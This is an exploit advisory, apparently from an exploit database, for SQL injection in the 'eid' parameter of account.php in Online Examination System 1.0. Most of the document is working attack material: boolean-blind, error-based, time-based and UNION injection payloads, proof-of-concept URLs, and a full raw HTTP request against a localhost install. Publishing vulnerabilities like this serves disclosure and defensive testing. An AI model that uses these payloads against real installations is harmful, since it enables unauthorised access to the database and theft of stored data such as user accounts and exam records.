# Exploit Title: Online Examination System 1.0 - 'eid' SQL Injection
# Google Dork: N/A
# Date: 2020-05-16
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14210/online-examination-system-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineexamination.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
#Description:
Online Examination System Project is vulnerable to
SQL injection via the 'eid' parameter on the account.php page.
# Create a new account and Move to the profile on top right side (click)
# vulnerable file : account.php
# vulnerable Parameter: eid
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5
Parameter: eid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=quiz&step=2&eid=5589741f9ed52' AND 1509=1509 AND 'aIOb'='aIOb&n=1&t=5
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4105 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(4105=4105,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ytnk'='Ytnk&n=1&t=5
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4498 FROM (SELECT(SLEEP(5)))EAAg) AND 'OoDV'='OoDV&n=1&t=5
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: q=quiz&step=2&eid=5589741f9ed52' UNION ALL SELECT NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL-- iOWr&n=1&t=5
---
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0
# Proof of Concept:
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=sqli&n=1&t=5
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5
GET /onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=l61egdpolqmktgtuoedjqmktge
Connection: keep-alive
Upgrade-Insecure-Requests: 1
q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5